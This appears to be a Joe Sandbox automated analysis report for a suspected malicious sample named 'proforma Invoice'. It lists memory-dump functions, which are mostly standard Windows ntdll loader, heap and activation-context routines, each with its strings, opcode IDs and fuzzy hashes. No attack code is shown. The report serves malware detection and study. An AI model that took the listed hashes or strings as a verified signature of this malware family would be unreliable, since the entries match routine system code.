                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011D8181, 011D81F5
                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 011D81E5
                                                                          • LdrpInitializeImportRedirection, xrefs: 011D8177, 011D81EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-475462383
                                                                          • Opcode ID: e88408a0ef5c0265f8de6904a8c99bdb3037d2da01db743b97447a17e7454b74
                                                                          • Instruction ID: 823bdf42332b4e1aed137483303152db5918af2c0698eeb3ecfa40d6a2d03cb0
                                                                          • Opcode Fuzzy Hash: e88408a0ef5c0265f8de6904a8c99bdb3037d2da01db743b97447a17e7454b74
                                                                          • Instruction Fuzzy Hash: 6A310471644346AFD31CEF28DC46E1ABBD4AF94B14F040558F9946B291E720EC04CBE2
                                                                          Function 011A096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 011A2DF0: LdrInitializeThunk.NTDLL ref: 011A2DFA
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0BA3
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0BB6
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0D60
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A0D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 1404860816-0
                                                                          • Opcode ID: c8e530af4714414ec1d77a1244e5a8045357c3fdc50a2fda9bc98540d08fa506
                                                                          • Instruction ID: f326b4b575149fc7a97c14645b61a6df43c0c127380adf49fefd8015777b0599
                                                                          • Opcode Fuzzy Hash: c8e530af4714414ec1d77a1244e5a8045357c3fdc50a2fda9bc98540d08fa506
                                                                          • Instruction Fuzzy Hash: 7C428E75900715DFDB29CF28C880BAABBF4FF48314F4445A9E989DB241E770AA84CF61
                                                                          Function 0116A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                          • API String ID: 0-379654539
                                                                          • Opcode ID: 462efbf64f449da0ef4c37ed0dc353efdf40d7943ab210871b6c18f0e127d538
                                                                          • Instruction ID: a7e1bea09c5d61e02aa4c725ea52253677c0d644dae032764a17345d285492e8
                                                                          • Opcode Fuzzy Hash: 462efbf64f449da0ef4c37ed0dc353efdf40d7943ab210871b6c18f0e127d538
                                                                          • Instruction Fuzzy Hash: BFC1BA70108382CFD719CF58D440B6ABBE8BF94708F04886EF996AB251E336D959CB57
                                                                          Function 01198402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • @, xrefs: 01198591
                                                                          • LdrpInitializeProcess, xrefs: 01198422
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01198421
                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0119855E
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1918872054
                                                                          • Opcode ID: 33f54f70d629b1d8e32237ba999641c0c186372b6665ab5bfddb4df8a8a7933d
                                                                          • Instruction ID: 283d748fc8b61352950fed1ddd4284cc2ade075bd8fc12799eafe119dc7a6b9d
                                                                          • Opcode Fuzzy Hash: 33f54f70d629b1d8e32237ba999641c0c186372b6665ab5bfddb4df8a8a7933d
                                                                          • Instruction Fuzzy Hash: 23918F71508349AFEB29DF65CC40FABBBE8BF85744F40492EFA9492151E730D904CB62
                                                                          Function 0119273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011D21D9, 011D22B1
                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011D22B6
                                                                          • SXS: %s() passed the empty activation context, xrefs: 011D21DE
                                                                          • .Local, xrefs: 011928D8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                          • API String ID: 0-1239276146
                                                                          • Opcode ID: 392551e0343d270a527e01dfb755ce12f333304ebf3605acd5a5b861fca3c2c0
                                                                          • Instruction ID: 3e92e096c4ce07f3a89e60345643efc95d657e128b7dd2533935894b54ad2cf8
                                                                          • Opcode Fuzzy Hash: 392551e0343d270a527e01dfb755ce12f333304ebf3605acd5a5b861fca3c2c0
                                                                          • Instruction Fuzzy Hash: D6A1A231900229EBDF2DCF68DC84BA9B7B1BF58354F1541E9E928A7251E7309E81CF91
                                                                          Function 01194AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 011D342A
                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011D3456
                                                                          • RtlDeactivateActivationContext, xrefs: 011D3425, 011D3432, 011D3451
                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011D3437
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                          • API String ID: 0-1245972979
                                                                          • Opcode ID: 1850c19cb198d79fa4f77f8f494e5aa814dab523ed1895b946f94a5793743a60
                                                                          • Instruction ID: 109608aa639db74daba6656342a433da0aec2f22dd6a376685257988946007bd
                                                                          • Opcode Fuzzy Hash: 1850c19cb198d79fa4f77f8f494e5aa814dab523ed1895b946f94a5793743a60
                                                                          • Instruction Fuzzy Hash: 28613576610B129FDB2ECF1CC941B2AB7E5BF90B60F15851DE8759B640D738E802CB92
                                                                          Function 011664AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011C10AE
                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011C106B
                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011C0FE5
                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011C1028
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                          • API String ID: 0-1468400865
                                                                          • Opcode ID: aca166e0f3c27424af2dad39ba9841c4a1f0391377a1d18613e3d44ef8589363
                                                                          • Instruction ID: 031cee21dc3f323460789137f2b3d8fa1c9cdf50c81e24d6f86418edeab62416
                                                                          • Opcode Fuzzy Hash: aca166e0f3c27424af2dad39ba9841c4a1f0391377a1d18613e3d44ef8589363
                                                                          • Instruction Fuzzy Hash: 7771E0B1904346AFCB25DF14C885B9B7FACAF94BA8F400468F9488B246D335D598CFD2
                                                                          Function 01194D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 011D3640, 011D366C
                                                                          • LdrpFindDllActivationContext, xrefs: 011D3636, 011D3662
                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011D362F
                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 011D365C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 0-3779518884
                                                                          • Opcode ID: fb8cc148ee991edc39d2709ecead8bcb8905aca0b42addab7dee7d9e97568cce
                                                                          • Instruction ID: d3db249df3e01029810e18ba99bb91f804bb067847630acf9a038704ff673d98
                                                                          • Opcode Fuzzy Hash: fb8cc148ee991edc39d2709ecead8bcb8905aca0b42addab7dee7d9e97568cce
                                                                          • Instruction Fuzzy Hash: E1318E7A900312ABEF3EDB0CDA88B7D76E4BB21754F074129D53453A51D7B09D8187C6
                                                                          Function 0118245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpDynamicShimModule, xrefs: 011CA998
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011CA9A2
                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011CA992
                                                                          • apphelp.dll, xrefs: 01182462
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-176724104
                                                                          • Opcode ID: 4ad50cd2ed287589400f9a7b572ae19085622a8e8a11bd3ce84cafc31c8baefc
                                                                          • Instruction ID: 88a94af53583b25c9f533645d7e00d70814a972cd83729b4493f0d3587f715e6
                                                                          • Opcode Fuzzy Hash: 4ad50cd2ed287589400f9a7b572ae19085622a8e8a11bd3ce84cafc31c8baefc
                                                                          • Instruction Fuzzy Hash: 57312871600305EBDB3EDF5DB88DAAABBB4FF90B04F16401DE90067245E7B09981CB90
                                                                          Function 011729A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0117327D
                                                                          • HEAP: , xrefs: 01173264
                                                                          • HEAP[%wZ]: , xrefs: 01173255
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                          • API String ID: 0-617086771
                                                                          • Opcode ID: 4b92b144772ffd2efeb2f0467c020ca82aa7329ac5100345fc7fc817c1418f92
                                                                          • Instruction ID: 0440991037ffac3d35ea348f29d5ba281188e9588df796d5e41c598d9ca4a921
                                                                          • Opcode Fuzzy Hash: 4b92b144772ffd2efeb2f0467c020ca82aa7329ac5100345fc7fc817c1418f92
                                                                          • Instruction Fuzzy Hash: 4B92DD71A04249DFDB29CF68C444BAEBBF1FF48304F188459E899AB391D735A942DF50
                                                                          Function 01170770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          • Opcode ID: d12a7df007c844ccdf340f38469ce9eab4b450ebf22279e547328b63a2d350e5
                                                                          • Instruction ID: 734f613fd749e6d165eb1eaa2d453469649210e0b7577e6de193289057b2929d
                                                                          • Opcode Fuzzy Hash: d12a7df007c844ccdf340f38469ce9eab4b450ebf22279e547328b63a2d350e5
                                                                          • Instruction Fuzzy Hash: 97F19B70B00606DFEB2DCF68C894B6AB7F6FB5A704F148168E4569B391D730E981CB91
                                                                          Function 01186962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $@
                                                                          • API String ID: 0-1077428164
                                                                          • Opcode ID: 67c74da07b6d860ced28ca3796359a54168e75c217637a17dfee06876038fb72
                                                                          • Instruction ID: afa36c049818b32bfb280bea7a88b7d251695a0e08d439d385f565f87d2cf4cc
                                                                          • Opcode Fuzzy Hash: 67c74da07b6d860ced28ca3796359a54168e75c217637a17dfee06876038fb72
                                                                          • Instruction Fuzzy Hash: A9C29171A083419FE729DF28C480BABBBE5AF98714F15892DF989C7281D734D845CF92
                                                                          Function 0115A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                          • API String ID: 0-2779062949
                                                                          • Opcode ID: b1e8e1fcfa054d7c4bfc60a3aa565679e7d368e736bde3ecadc181760a761a16
                                                                          • Instruction ID: 7687207d2e26a1bd213bd4d9878d8642f51c19e6a087ef28f83196f0ffe75441
                                                                          • Opcode Fuzzy Hash: b1e8e1fcfa054d7c4bfc60a3aa565679e7d368e736bde3ecadc181760a761a16
                                                                          • Instruction Fuzzy Hash: 35A16C759112299BDB39DF68CC88BEAB7B8EF44704F1041EAE908A7250D7359F85CF90
                                                                          Function 01180BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Failed to allocated memory for shimmed module list, xrefs: 011CA10F
                                                                          • LdrpCheckModule, xrefs: 011CA117
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011CA121
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-161242083
                                                                          • Opcode ID: 6ceb3cfd3e913237db8fb01e93d9eb7f373f708c727b95e41fc44ab19180ebb2
                                                                          • Instruction ID: 9351f0a8e6ece672fabc7230981315d5955094682603632d5814fb0f881b06fa
                                                                          • Opcode Fuzzy Hash: 6ceb3cfd3e913237db8fb01e93d9eb7f373f708c727b95e41fc44ab19180ebb2
                                                                          • Instruction Fuzzy Hash: 4371BF71A00309DFDB2DEF68D985AAEB7F4FF88608F15806DE80297251E734AD85CB51
                                                                          Function 01170A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-1334570610
                                                                          • Opcode ID: 15c62800a642cc6c3918a1e06ee44686209025b7001a5173933a92bd747d20f6
                                                                          • Instruction ID: f60628f5b8f13362fb0534b3c4b07c14155ed9040ec1a131365f04a319802085
                                                                          • Opcode Fuzzy Hash: 15c62800a642cc6c3918a1e06ee44686209025b7001a5173933a92bd747d20f6
                                                                          • Instruction Fuzzy Hash: C8619A756043029FDB6DDF28C480B6ABBB2FF4A704F14855EE8598B392D770E981CB91
                                                                          Function 0119C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 011D82DE
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011D82E8
                                                                          • Failed to reallocate the system dirs string !, xrefs: 011D82D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-1783798831
                                                                          • Opcode ID: 8941fad4b4781cf562a0d0b6bc72b2730752b06bf72fdfd9727c3af7575de87d
                                                                          • Instruction ID: 0b74dd5d8f0e39d02499fed62e0234c5692186ef25a735fa8b971c0edbe47c27
                                                                          • Opcode Fuzzy Hash: 8941fad4b4781cf562a0d0b6bc72b2730752b06bf72fdfd9727c3af7575de87d
                                                                          • Instruction Fuzzy Hash: 4C41E372504701ABDB2DEB68E888B5B7BE8EF44654F00492AF998D7250E774D800CBA2
                                                                          Function 0121C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0121C1C5
                                                                          • PreferredUILanguages, xrefs: 0121C212
                                                                          • @, xrefs: 0121C1F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          • Opcode ID: 4c51cbf582dfbc28d4066e5de0b33a0ece9f62e03b72d31b7198acffd3b73d00
                                                                          • Instruction ID: c15092b260121fe5d70dd1f4685d39d43eb81e32785ef073bac3bfb4a30619b2
                                                                          • Opcode Fuzzy Hash: 4c51cbf582dfbc28d4066e5de0b33a0ece9f62e03b72d31b7198acffd3b73d00
                                                                          • Instruction Fuzzy Hash: C5419375E5020AEBDF15DEE8C841FEEBBF8AB24714F10406AEA09B7244D7B49A548B50
                                                                          Function 011F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          • API String ID: 0-1373925480
                                                                          • Opcode ID: 6ff393502a005198f08f98d93c877184c7ca90d98308a52005c43fa8581b055b
                                                                          • Instruction ID: d67a9d70cc2106f56875be68fb2a1f7639acfa8c51638d29ee9ae977a0a16880
                                                                          • Opcode Fuzzy Hash: 6ff393502a005198f08f98d93c877184c7ca90d98308a52005c43fa8581b055b
                                                                          • Instruction Fuzzy Hash: 07412536A046598BEB2DDBE8D840BAEBBB8FF55354F14046EDA01EBB81D7349901CB11
                                                                          Function 011E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011E4888
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 011E4899
                                                                          • LdrpCheckRedirection, xrefs: 011E488F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          • API String ID: 0-3154609507
                                                                          • Opcode ID: dae0e7481dcc3bfd07e0b19e1365c2d9b87b06f7fee4c3babcb90447cc2fe14d
                                                                          • Instruction ID: e8625b78f45391c38e3c76557ecc4f53f4ea79886ff889e13a9a43efc8af049f
                                                                          • Opcode Fuzzy Hash: dae0e7481dcc3bfd07e0b19e1365c2d9b87b06f7fee4c3babcb90447cc2fe14d
                                                                          • Instruction Fuzzy Hash: B941D032A04F518BCB29CEE9D848E267BE5EF89A50F06065DED89D7A51D330DC00CBC1
                                                                          Function 01170BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-2558761708
                                                                          • Opcode ID: 558c49d6b99b856790daffb9a229fdf0c08eab0c14080ac506f8fcd05c5e393b
                                                                          • Instruction ID: b63524ba2334eb53426de42a9f0dcc6b3d126dd18c2ffdc437f79dc04b7a86fe
                                                                          • Opcode Fuzzy Hash: 558c49d6b99b856790daffb9a229fdf0c08eab0c14080ac506f8fcd05c5e393b
                                                                          • Instruction Fuzzy Hash: B811CD31315202DFDBADCA18C494B3AF7B6AF56A19F19815DF406CB251EB30E880C756
                                                                          Function 011E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrpInitializationFailure, xrefs: 011E20FA
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 011E2104
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 011E20F3
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          • Opcode ID: e128507367d53d58925ecbde15ac7c10d23f46e68eaa1b3344546ac4ed4bb699
                                                                          • Instruction ID: 982a30ae05b328cfb42b443c4865cc28cde873f04f1853dcedb5afba3610a48e
                                                                          • Opcode Fuzzy Hash: e128507367d53d58925ecbde15ac7c10d23f46e68eaa1b3344546ac4ed4bb699
                                                                          • Instruction Fuzzy Hash: C6F0A4356407097BE72CD64CEC5AF993BA8EB40B94F540059F6006B685D3F0A640CA51
                                                                          Function 011703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          • API String ID: 48624451-232158463
                                                                          • Opcode ID: b321714d1ba76f9e92963a141dcf5ba27663ae3ba87eb052d13bb0eb187c2807
                                                                          • Instruction ID: eeb98e3e3f1cfb7c72e9507d3cdb0ef90e7e1db491fb4ada14b53de2ef08715d
                                                                          • Opcode Fuzzy Hash: b321714d1ba76f9e92963a141dcf5ba27663ae3ba87eb052d13bb0eb187c2807
                                                                          • Instruction Fuzzy Hash: 43715D71A0024A9FDB09DF98C994FAEBBF8BF18744F154069E905E7251EB34ED01CB61
                                                                          Function 0116A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LdrResSearchResource Enter, xrefs: 0116AA13
                                                                          • LdrResSearchResource Exit, xrefs: 0116AA25
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          • API String ID: 0-4066393604
                                                                          • Opcode ID: d02a71c131ba5378c8aa809615d9126011221585c8e040cac6d801b32732c9b2
                                                                          • Instruction ID: 10c6127158ca2a98bb765c51463f61c99f3b2f5152396f5b0551d8582b1db78b
                                                                          • Opcode Fuzzy Hash: d02a71c131ba5378c8aa809615d9126011221585c8e040cac6d801b32732c9b2
                                                                          • Instruction Fuzzy Hash: 13E1BD71A00219AFEB2ECE98D980BAEBBBEFF54714F01442AEA11F7241D7359950CB51
                                                                          Function 0122A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
